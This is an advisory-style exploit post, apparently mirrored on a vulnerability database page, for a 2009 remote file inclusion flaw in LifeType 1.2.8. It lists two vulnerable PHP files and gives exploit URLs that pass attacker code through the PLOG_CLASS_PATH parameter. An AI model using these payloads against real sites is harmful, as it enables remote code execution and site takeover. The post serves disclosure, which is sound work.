Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22169
HistoryJul 16, 2009 - 12:00 a.m.

LifeType 1.2.8 Remote File Inclusion Vulnerability

2009-07-1600:00:00
vulners.com
39

/===============================================================================================================================================\
|
| [o] LifeType 1.2.8 Remote File Inclusion Vulnerability
|
| Software : LifeType 1.2.8
| Vendor : http://lifetype.net/
| Author : Cru3l.b0y
| Contact : [email protected]
| Home : WwW.DeltaHacking.Net

|===============================================================================================================================================|
|
| [o] Vulnerable file
|
| install/installation.class.php
|
| include_once( PLOG_CLASS_PATH."config/config.properties.php" );
|
|
| class/bootstrap.php
|
| include( PLOG_CLASS_PATH."class/object/loader.class.php" );
|
|
| [o] Exploit
|
| http://localhost/[path]/install/installation.class.php?PLOG_CLASS_PATH=[evilcode]
| http://localhost/[path]/class/bootstrap.php?PLOG_CLASS_PATH=[evilcode]
|

|===============================================================================================================================================|